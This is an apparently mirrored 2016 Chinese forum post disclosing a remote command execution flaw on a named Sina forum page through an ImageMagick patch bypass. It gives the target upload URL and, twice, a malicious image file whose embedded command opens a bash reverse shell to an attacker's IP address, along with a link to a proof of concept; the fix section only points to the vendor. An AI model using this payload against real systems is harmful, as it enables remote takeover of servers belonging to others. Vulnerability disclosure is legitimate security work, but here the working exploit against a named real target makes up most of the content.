HanDs
管理员

[7月漏洞公开] 新浪某站点存在远程命令执行漏洞(ImageMagick补丁绕过) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

刷起来

详细说明:

漏洞链接:

http://club.news.sina.com.cn/post.php?action=newthread&fid=11



上传插图,如1.jpg 内容如下:

code 区域
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/1x.x.x.x/53 0>&1"
pop graphic-context





成功截图:

111.png







poc:

http://my.oschina.net/u/2393235/blog/684599

漏洞证明:

漏洞链接:

http://club.news.sina.com.cn/post.php?action=newthread&fid=11



上传插图,如1.jpg 内容如下:

code 区域
push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/1x.x.x.x/53 0>&1"
pop graphic-context





成功截图:

111.png







poc:

http://my.oschina.net/u/2393235/blog/684599

修复方案:

见官网


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复